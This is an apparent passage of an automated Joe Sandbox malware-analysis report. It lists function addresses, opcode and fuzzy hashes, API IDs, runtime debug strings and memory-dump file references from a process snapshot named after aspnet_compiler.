                                                • Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
                                                • Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
                                                Function 0093EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD
                                                • RTL: Re-Waiting, xrefs: 009724FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                • Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
                                                • Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                • Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60
                                                Function 0094FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: c5c6ff21687514e1d96d00d2caf9acf8297ec8c698c99a0c8ac3dff7d0cc2a40
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: A2919172D0021AEFDF24CF59C855AAFB7B8FF55309F24847AD445A72A2E7304A41CB91
                                                Function 009C5CFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 237COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: $$0
                                                • API String ID: 1302938615-389342756
                                                • Opcode ID: ea51973c8aa4d2604151950c5ffe2c4fd6916210c209e7f5d6d40c90bd95cbff
                                                • Instruction ID: 99a808b50d8f0f32f8975b99d274b60f20cc6953204e6c598a98653e63259d43
                                                • Opcode Fuzzy Hash: ea51973c8aa4d2604151950c5ffe2c4fd6916210c209e7f5d6d40c90bd95cbff
                                                • Instruction Fuzzy Hash: 8F91AF30D04B9AAFDF24CFA9C444BEDBBB4AF45310F16465ED4A2A72D1C3746A81CB52